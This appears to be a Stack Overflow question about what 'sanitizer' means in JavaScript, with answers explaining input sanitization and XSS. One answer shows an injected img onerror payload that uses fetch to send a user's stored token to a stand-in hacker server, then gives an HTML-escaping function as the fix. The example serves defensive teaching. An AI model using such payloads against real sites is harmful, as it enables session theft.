# What does "sanitizer" mean in JS?

Tags: javascript

[code screenshot](https://i.stack.imgur.com/1zVNg.png)
I was reading a JS code and there are several comments saying "defines the sanitizer for the search" and I don't get what that means.

Does it mean "cleaning" or "protection"? The code is about JS-Search, and usually the following comment is "to prevent some words from being deleted".

English is not my first language, so maybe that's why I didn't understand. If anyone could give me an explanation, I would be very grateful.

Comment: You will get more helpful answers if you could provide a link to the code where you saw this comment.

Answer (score 2):

When having a form, sometimes people write malicious code in it. You don't want that code to execute, so it goes into a sanitizer to prevent that.

Sanitization isn't limited to JS, it's also necessary in SQL: [image]

The main problem arises when sometimes you want some HTML tags to work but not all. If you allow a `<script>` to be executed on something like a blog or a forum, and someone is signed in, a malicious person might be able to obtain their login info and wreak havoc.

Comment: @DillanWilding I put something like that below the image :þ

Answer (score 0):

In the javascript ecosystem its mainly used to prevent XSS (Cross site scripting) attack, which is a type of attack where a hacker use a breach in the frontend code to execute malicious javascript in someone else browser (stealing their tokens password and even more).

this type of attack take advantage of the binding of user inputs into the html view or the use of the unsafe function eval (to evaluate a string as code) in a way to execute the code they want lets take an example to illustrate this:

if you have a user input that take an url to his profile picture, this picture is displayed by src attribute of an img tag :

```
<img src="userProfilePictureURL" />
```

Until that point its all right, but what if the user something like this instead of picture url:

```
http://falseurl.com/img.png" onerror="fetch('thehackerserverUrl',{token})"
```

the most important part is the first closing " just before onerror that close the src attribute and permit entring other attribute and inject javascript on it the stored result of this is :

```
<img src="http://falseurl.com/img.png" onerror="fetch('thehackerserverUrl',{localstorage.token})">
```

since the url dosen't existe it will fallback to the onerror handler and send the token to the hacker.
To prevent this arbitrary code injection we sanitize user input principally by escaping those characters replacing them by their respective html safe name code.
this way the malicious code will be added as string instead of an executable code

```
function escapeHtml(unsafe) {
   return unsafe
     .replace(/&/g, "&amp;")
     .replace(/</g, "&lt;")
     .replace(/>/g, "&gt;")
     .replace(/"/g, "&quot;")
     .replace(/'/g, "&#039;");
 }
```